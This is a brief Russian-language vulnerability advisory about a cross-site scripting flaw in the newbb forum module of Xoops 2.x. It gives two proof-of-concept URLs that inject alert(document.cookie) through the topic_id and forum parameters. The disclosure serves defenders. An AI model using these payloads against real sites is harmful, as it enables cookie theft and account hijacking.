Программа: Xoops 2.x 

Уязвимость обнаружена в Xoops в 'newbb’ модуле. Удаленный пользователь может выполнить XSS нападение. 

Пример: 

http://[target]/modules/newbb/viewtopic.php? topic_id=14577&forum=2"><;script>alert(document.cookie);
</script>

http://[target]/modules/newbb/viewtopic.php? topic_id=14577"><script&gt;alert(document.cookie);
</script>&forum=2

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии